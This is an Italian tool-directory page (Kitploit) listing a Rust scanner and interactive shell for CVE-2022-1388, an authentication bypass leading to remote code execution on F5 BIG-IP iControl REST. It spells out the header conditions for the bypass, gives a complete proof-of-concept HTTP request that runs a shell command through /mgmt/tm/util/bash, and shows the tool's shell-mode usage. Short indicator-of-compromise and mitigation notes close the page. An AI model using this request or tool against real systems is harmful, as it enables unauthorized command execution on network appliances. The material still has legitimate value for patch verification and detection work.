Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-1388-rs — CVE-2022-1388 F5 BIG-IP iControl REST Bypass dell'autenticazione e RCE scritto in Rust | Kitploit
Strumenti/GitHubGitHub/aancw/cve-2022-1388-rs
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST Bypass dell'autenticazione e RCE scritto in Rust

Vedi Repository
254 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-1388-rs

Scanner e shell interattiva per CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE scritto in Rust

Riepilogo

Per riepilogare, ecco una panoramica delle condizioni necessarie di una richiesta per sfruttare questa vulnerabilità:

  • L'header Connection deve includere X-F5-Auth-Token
  • L'header X-F5-Auth-Token deve essere presente
  • L'header Host deve essere localhost / 127.0.0.1 oppure l'header Connection deve includere X-Forwarded-Host
  • L'header Auth deve essere impostato con il nome utente admin e una password qualsiasi

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

Configurazione LAB

  • Puoi trovare il laboratorio qui

Utilizzo

root@kitploit:~
$ cve_2022_1308_rs -h CVE-2022-1388 PoC 1.0 Petruknisme <[email protected]> Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust USAGE: cve_2022_1388_rs [OPTIONS] --url <URL> OPTIONS: -h, --help Print help information -s, --shell This mode for accessing payload with interactive shell -u, --url <URL> F5 Big-IP target url -V, --version Print version information

Requisiti

  • Rust
  • Cargo

IoC

Gli IoC possono essere trovati nel file di log /var/log/audit. I comandi non riconosciuti eseguiti dall'endpoint mgmt/tm/util/bash dovrebbero destare preoccupazione.

Mitigazione

Aggiornare all'ultima versione o mitigare seguendo le istruzioni riportate nell'avviso di sicurezza F5

  • https://support.f5.com/csp/article/K23605346

Riferimenti

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Scarica lo strumento